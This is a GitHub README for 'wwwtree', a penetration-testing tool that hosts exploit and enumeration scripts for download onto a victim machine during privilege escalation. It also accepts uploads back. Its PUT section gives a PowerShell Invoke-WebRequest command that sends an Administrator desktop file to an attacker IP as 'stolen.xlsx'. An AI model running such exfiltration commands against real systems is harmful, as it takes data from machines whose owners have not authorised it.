Skip to content

A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.

License

Notifications You must be signed in to change notification settings

t3l3machus/wwwtree

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

17 Commits
 
 
 
 
 
 
 
 

Repository files navigation

wwwtree

Python License

Purpose

A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.

Video Presentation

https://www.youtube.com/watch?v=iog-eb_N0Hg

Preview

image

Description

wwwtree does the following:

  • hosts a specified root directory and prints the contents in a tree-like format. Every file is translated to it's equivalent server URL path so you can quickly copy it and use a web client to transfer it to the victim.
  • Filters out files that contain specific substrings based on user provided keywords (use -k to parse comma seperated values). Handy for quickly locating resources saved in deep and populated directory structures.
  • Automatically hides from the output files and folders that are most likely not in the scope of enumeration / exploitation (e.g., txt, yml, docx files or .git directories). You can control this behaviour by editing the list variables hide_extensions and hide_dirs in the source.
  • The wwwtree python http server handler supports PUT requests and by default saves files in /tmp (you can change that in the source). You can use it to transfer files from the victim to the attacker machine.

Installation & Usage

git clone https://github.com/t3l3machus/wwwtree
cd ./wwwtree
pip3 install -r requirements.txt
chmod +x wwwtree.py

wwwtree.py [-h] -r ROOT_PATH -i INTERFACE [-l LEVEL] [-p PORT] [-k KEYWORDS] [-A] [-q]

PUT Requests

I've noticed that curl on Windows seems to work improperly when trying to transfer large files. Powershell's Invoke-WebRequest works much better:

powershell -c "invoke-webrequest -method PUT -headers @{'Content-Type'='application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'} -usebasicparsing -uri http://192.168.111.135/stolen.xlsx -body (get-content C:\Users\Administrator\Desktop\some_file.xlsx)"

About

A utility for quickly and easily locating, web hosting and transferring resources (e.g., exploits/enumeration scripts) from your filesystem to a victim machine during privilege escalation.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages